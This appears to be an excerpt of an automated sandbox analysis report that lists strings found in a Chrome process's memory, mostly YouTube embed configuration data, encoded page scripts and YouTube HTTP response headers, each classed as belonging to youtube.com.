H4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323134548.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: H4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true}riginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352259272.000028EC04CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323201812.000028EC04CAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2329710109.000028EC0418C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 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
Source: chrome.exe, 00000000.00000002.2496886639.000028EC04A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HRpgw3pr2zx+zbfu3OWBb9XAtv9LdoBbGVGm+zuRWG0wfuaDwOM2rYHCpZ+VSLQiZ9D5bX3p2VMrnbgVKEoWkTWrk8fyZTrHYPBRUU8EDhy8lenDZgCZtDSJGoEBdAEFxDOYT7W0Cw2AR6H02PyDCsZ2VFnceeJ0fFcF5Hoj/QMQlrN27uj7H5QHmTsInWJHfccNk2UVK6ETXqx+fdfNSxrnavEgpatDDx1vMATx0pCTzdHAItQFwoJ4cX94Z1prk0k+HpyVm3aW08aZW+VdqhNN+vsWzPCPAZZiE+fIi5eBDITLPIqrb9t1Md7ubrDqYycWRQQEmUF3jfcGwlMekRkl4Nkl85RqJee2muJQiwEIH+CDK+CzCQ2lrnDQ+hqUEluKLkhMz/7hXiIJOEgIHJQr1dxUIlz91kJWh4Iul7davpjQd6IIt3Mnp2hR0rWDz8+ZWTQCQ13U1oC65XnbDZTswiB8vjvmkYT+8HoP9rS6/mSXC7IXx91zlvVDeDh5/4tPIhtV6Q82PUl0Fyip2ILK+/PPoDVwBOpchDpnju0DW2PsnB4LisW1WEZ7b9F7/ksGBLPhmHhXSvuEQsRLqA92KUS2+r0geo8whVNHZ+EX8kf7Art9UMoe80ec0yf0NprcvqXdzoDGw1Gzeg1YtYNHX3xcxZbamGgk5xOFGc6Qex03G7MvVG8jYjbrGBHp1x9oGHnpiTMFGBfIhxTopUNS2KcQ/8xpnypBymD/H0WS8s8jn8o0X35mivo8vtDTA95pr1nv3cNo78wP5ZSptCaYgADoG6o6h5Vwet6Pd/5nX/rH6XQg6m+h/O4unCB2pXHaxwj04cNjXCdcov4MMzMH7RgKKLn6ioKjztll35sUSyQaCW0hCYwgcFP1reCIB8x+p02ZSk66Kgk9yTZHb+SjgrPBwBSvp6O9TW0fhwfHHFu6ne6tKeE35QZfw0/Qsh8JNEBQZ9e9U7523ZknUEXDNab3atftuqwYudixqH6wUBDo1vTzxubK2wG+wvSldRddbcyoxLd651Sut6692sQsO6Ym59DVJG42S23BSF0sLYGKXMRsRc9rq9wpAmLb9P/k//ZBTB6Qd0plKhs3fekACyDEcikLaY9reD3c6DzT6L7O8FKTmNcxGhJ/9En4y6dRVdXUZw2JiFSikE9ruEQblbsveqBkNkLbh9/zKVTS6S7qy3CyNDSwvG8gkUoVn9Lfde0RhqMelaURaTIe0l9U4AP6SUWS4a4fUoL1sDcTd/OZbyGA\\u003d\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2369861259.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTP/1.1 200access-control-allow-origin:https://www.youtube.comcross-origin-resource-policy:cross-originaccess-control-allow-credentials:trueaccess-control-allow-headers:X-Playlog-Webcontent-type:text/plain; charset=UTF-8content-encoding:gzipdate:Thu, 22 May 2025 15:06:35 GMTserver:Playlogcontent-length:131x-xss-protection:0x-frame-options:SAMEORIGINalt-svc:h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC0458C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: HTTP/1.1 200access-control-allow-origin:https://www.youtube.comcross-origin-resource-policy:cross-originaccess-control-allow-credentials:trueaccess-control-allow-headers:X-Playlog-Webp3p:CP="This is not a P3P policy! See g.co/p3phelp for more info."content-type:text/plain; charset=UTF-8content-encoding:gzipdate:Thu, 22 May 2025 15:06:33 GMTserver:Playlogcontent-length:131x-xss-protection:0x-frame-options:SAMEORIGINalt-svc:h3=":443"; ma=2592000,h3-29=":443"; ma=2592000expires:Thu, 22 May 2025 15:06:33 GMTcache-control:private equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2360620898.000028EC06804000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Hk5dXBybjU5N0VsSUx1M1h5aERPV3NlMjNJTmlnRzhPSmtVbUZqUlc1aHpyQVdldjdDbTRKc0xwSER5TXNDOWYwWGVqamFXYjJtVENXblltbEl0WmswQjNTenZXaVZNdVl1VzcwdEhFZmtISk9vWW5OekRIQU8rMExkN0JtaEFZVFdTbm5RYVJ2cjF0RVQ2YU1XOXJyN2l2ZzVWQmx1ZzMrUXI4ZUsrRkd2b3JQQTlBT09NKytDK0hsald6OUVsWVEzOXBTQjYwWVkzYUNqK2l3VTU5b0tMSFMweWRPWU5nVmd6T2svNjU1ZWJoeVV6dVlTRlU1dHRiQkc0Q1dTN2F6YTRjVFdhNGJtMDBUR3hOUEY4Ui8xNWVrWVdqOHFYMW1jQWxyZW9FK1pTbmJOUjg4N0JzREJwb3pUeERMNUNkcm9iWko5elRPUGsvQlJ3SldWSmNvRTlXbElwRjdNa0FRa2w5aWlxTmtyN3FYY2dYVVhXZGV6L2oxRENCNGRrdUZLOE1tb2xCVlhHVkJ5VjUxN1RsNW1GUmx5NTIvVEdaRHpsaWllY2JBdm1GalBrYmNOa2duNGxScjZqSFMvMGdIR1RrbzdPYjJ3akc2MFY5Lzd0QklXaGRHNDdQQlZVMmxhRDhSSVRuSTM5U2o1eWd0eXA2dDBNQk41aUFzc1R2STVHODdJZFhHaG5QVEFDU21QbU9YbVYydklYdTgrWlVEYlRzSXk2U0c0SDR4NjVLT3pDREFYeXRvNmV2VVJtcFpWV0N5S3V6TGU4VEI0M0ZnS0hVdWIxclA0aHVrd1Z3endDVDE1NzRCNmUvTFljeHVvaXZmekt0c2hzUTZ6YktINy9JbGZ1S3U3Q1E2bmVYWUN1YXh1UEFvSm9rUWN5SXZpc0NCdmp1a2FpeXlWc0ZOczR1c2JKMnIvZXl5TkpXQWo5VzdiQittcFg0cVFhTmtzcURMZUpRNUZGRmU5ZnFlK0xWQW94UWlXVFN0UjVnYzlFSlFsV0JvODRVbWY5VWkzbWF4TGoyVjdzTHB5bGM5Zmh5NmlmazhJbXdsUnZjRXVneDJhZVZXdmFsMnB5Ty9OYnlMazA4YUJDbUxsSjFhWGdEYWhqM3JnS1hQQmI1UE9vL0tMU25xN3IxV3ZPZ1FHbkcwblBQWTlGemh3R3JBXHUwMDNkXCIsXCJpbnRlcnByZXRlclNhZmVVcmxcIjp7XCJwcml2YXRlRG9Ob3RBY2Nlc3NPckVsc2VUcnVzdGVkUmVzb3VyY2VVcmxXcmFwcGVkVmFsdWVcIjpcIi8vd3d3Lmdvb2dsZS5jb20vanMvdGgvdjE1UUNqbTZXTzNRRXM4MGNoRzhRZlMxSGxGckRvV0JMbFN2eHNwa2l1QS5qc1wifSxcInNlcnZlckVudmlyb25tZW50XCI6MX19fSxcInZpZGVvRmxhZ3NcIjp7XCJwbGF5YWJsZUluRW1iZWRcIjp0cnVlLFwiaXNDcmF3bGFibGVcIjp0cnVlfSxcInByZXZpZXdQbGF5YWJpbGl0eVN0YXR1c1wiOntcInN0YXR1c1wiOlwiT0tcIixcInBsYXlhYmxlSW5FbWJlZFwiOnRydWUsXCJjb250ZXh0UGFyYW1zXCI6XCJRMEZGVTBGblowRVx1MDAzZFwifSxcImVtYmVkZGVkUGxheWVyTW9kZVwiOlwiRU1CRURERURfUExBWUVSX01PREVfREVGQVVMVFwiLFwiZW1iZWRkZWRQbGF5ZXJDb25maWdcIjp7XCJlbWJlZGRlZFBsYXllck1vZGVcIjpcIkVNQkVEREVEX1BMQVlFUl9NT0RFX0RFRkFVTFRcIixcImVtYmVkZGVkUGxheWVyRmxhZ3NcIjp7fX0sXCJlbWJlZGRlZFBsYXllckNvbnRleHRcIjp7XCJlbWJlZGRlZFBsYXllckVuY3J5cHRlZENvbnRleHRcIjpcIkFENVp6RlNfV2Zmc0liRXVsMENFaGdMRU1WUkRGU3N2YnpWWm9WbEdsSG55aDdac2Q1RFZnNmhobG5vVUFMcXNKSFMybnpUdkxjVEotZTlXRW8yUldnVFFZZUFmZ2hwX3hhWDk1dVJEQzNCQzY2ZGdCeUF6Y2lmM3ZzRks3WGRCZkVjZlwiLFwiYW5jZXN0b3JPcmlnaW5zU3VwcG9ydGVkXCI6ZmFsc2V9fSIsInZpZGVvX2lkIjoiRlVSaTVhSGdwMWcifSwiUE9TVF9NRVNTQUdFX09SSUdJTiI6IioiLCJWSURFT19JRCI6IkZVUmk1YUhncDFnIiwiRE9NQUlOX0FETUlOX1NUQVRFIjoiIn0pO3dpbmRvdy55dGNmZy5vYmZ1c2NhdGVkRGF0YV8gPSBbXTs=","url":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","taburl":"https://fountainofhealth.ca/en","IsInline":false,"Dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2302249757.000028EC04D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Hl0Y3NpPXtndDpmdW5jdGlvbihuKXtuPShufHwiIikrImRhdGFfIjtyZXR1cm4geXRjc2lbbl18fCh5dGNzaVtuXT17dGljazp7fSxpbmZvOnt9LGdlbDp7cHJlTG9nZ2VkR2VsSW5mb3M6W119fSl9LG5vdzp3aW5kb3cucGVyZm9ybWFuY2UmJndpbmRvdy5wZXJmb3JtYW5jZS50aW1pbmcmJndpbmRvdy5wZXJmb3JtYW5jZS5ub3cmJndpbmRvdy5wZXJmb3JtYW5jZS50aW1pbmcubmF2aWdhdGlvblN0YXJ0P2Z1bmN0aW9uKCl7cmV0dXJuIHdpbmRvdy5wZXJmb3JtYW5jZS50aW1pbmcubmF2aWdhdGlvblN0YXJ0K3dpbmRvdy5wZXJmb3JtYW5jZS5ub3coKX06ZnVuY3Rpb24oKXtyZXR1cm4obmV3IERhdGUpLmdldFRpbWUoKX0sdGljazpmdW5jdGlvbihsLHQsbil7dmFyIHRpY2tzPXl0Y3NpLmd0KG4pLnRpY2s7dmFyIHY9dHx8eXRjc2kubm93KCk7aWYodGlja3NbbF0pe3RpY2tzWyJfIitsXT10aWNrc1siXyIrbF18fFt0aWNrc1tsXV07dGlja3NbIl8iK2xdLnB1c2godil9dGlja3NbbF09CnZ9LGluZm86ZnVuY3Rpb24oayx2LG4pe3l0Y3NpLmd0KG4pLmluZm9ba109dn0saW5mb0dlbDpmdW5jdGlvbihwLG4pe3l0Y3NpLmd0KG4pLmdlbC5wcmVMb2dnZWRHZWxJbmZvcy5wdXNoKHApfSxzZXRTdGFydDpmdW5jdGlvbih0LG4pe3l0Y3NpLnRpY2soIl9zdGFydCIsdCxuKX19OwooZnVuY3Rpb24odyxkKXtmdW5jdGlvbiBpc0dlY2tvKCl7aWYoIXcubmF2aWdhdG9yKXJldHVybiBmYWxzZTt0cnl7aWYody5uYXZpZ2F0b3IudXNlckFnZW50RGF0YSYmdy5uYXZpZ2F0b3IudXNlckFnZW50RGF0YS5icmFuZHMmJncubmF2aWdhdG9yLnVzZXJBZ2VudERhdGEuYnJhbmRzLmxlbmd0aCl7dmFyIGJyYW5kcz13Lm5hdmlnYXRvci51c2VyQWdlbnREYXRhLmJyYW5kczt2YXIgaT0wO2Zvcig7aTxicmFuZHMubGVuZ3RoO2krKylpZihicmFuZHNbaV0mJmJyYW5kc1tpXS5icmFuZD09PSJGaXJlZm94IilyZXR1cm4gdHJ1ZTtyZXR1cm4gZmFsc2V9fWNhdGNoKGUpe3NldFRpbWVvdXQoZnVuY3Rpb24oKXt0aHJvdyBlO30pfWlmKCF3Lm5hdmlnYXRvci51c2VyQWdlbnQpcmV0dXJuIGZhbHNlO3ZhciB1YT13Lm5hdmlnYXRvci51c2VyQWdlbnQ7cmV0dXJuIHVhLmluZGV4T2YoIkdlY2tvIik+MCYmdWEudG9Mb3dlckNhc2UoKS5pbmRleE9mKCJ3ZWJraXQiKTwwJiZ1YS5pbmRleE9mKCJFZGdlIik8CjAmJnVhLmluZGV4T2YoIlRyaWRlbnQiKTwwJiZ1YS5pbmRleE9mKCJNU0lFIik8MH15dGNzaS5zZXRTdGFydCh3LnBlcmZvcm1hbmNlP3cucGVyZm9ybWFuY2UudGltaW5nLnJlc3BvbnNlU3RhcnQ6bnVsbCk7dmFyIGlzUHJlcmVuZGVyPShkLnZpc2liaWxpdHlTdGF0ZXx8ZC53ZWJraXRWaXNpYmlsaXR5U3RhdGUpPT0icHJlcmVuZGVyIjt2YXIgdk5hbWU9IWQudmlzaWJpbGl0eVN0YXRlJiZkLndlYmtpdFZpc2liaWxpdHlTdGF0ZT8id2Via2l0dmlzaWJpbGl0eWNoYW5nZSI6InZpc2liaWxpdHljaGFuZ2UiO2lmKGlzUHJlcmVuZGVyKXt2YXIgc3RhcnRUaWNrPWZ1bmN0aW9uKCl7eXRjc2kuc2V0U3RhcnQoKTtkLnJlbW92ZUV2ZW50TGlzdGVuZXIodk5hbWUsc3RhcnRUaWNrKX07ZC5hZGRFdmVudExpc3RlbmVyKHZOYW1lLHN0YXJ0VGljayxmYWxzZSl9aWYoZC5hZGRFdmVudExpc3RlbmVyKWQuYWRkRXZlbnRMaXN0ZW5lcih2TmFtZSxmdW5jdGlvbigpe3l0Y3NpLnRpY2soInZjIil9LApmYWxzZSk7aWYoaXNHZWNrbygpKXt2YXIgaXNIaWRkZW49KGQudmlzaWJpbGl0eVN0YXRlfHxkLndlYmtpdFZpc2liaWxpdHlTdGF0ZSk9PSJoaWRkZW4iO2lmKGlzSGlkZGVuKXl0Y3NpLnRpY2soInZjIil9dmFyIHNsdD1mdW5jdGlvbihlbCx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7dmFyIG49eXRjc2kubm93KCk7ZWwubG9hZFRpbWU9bjtpZihlbC5zbHQp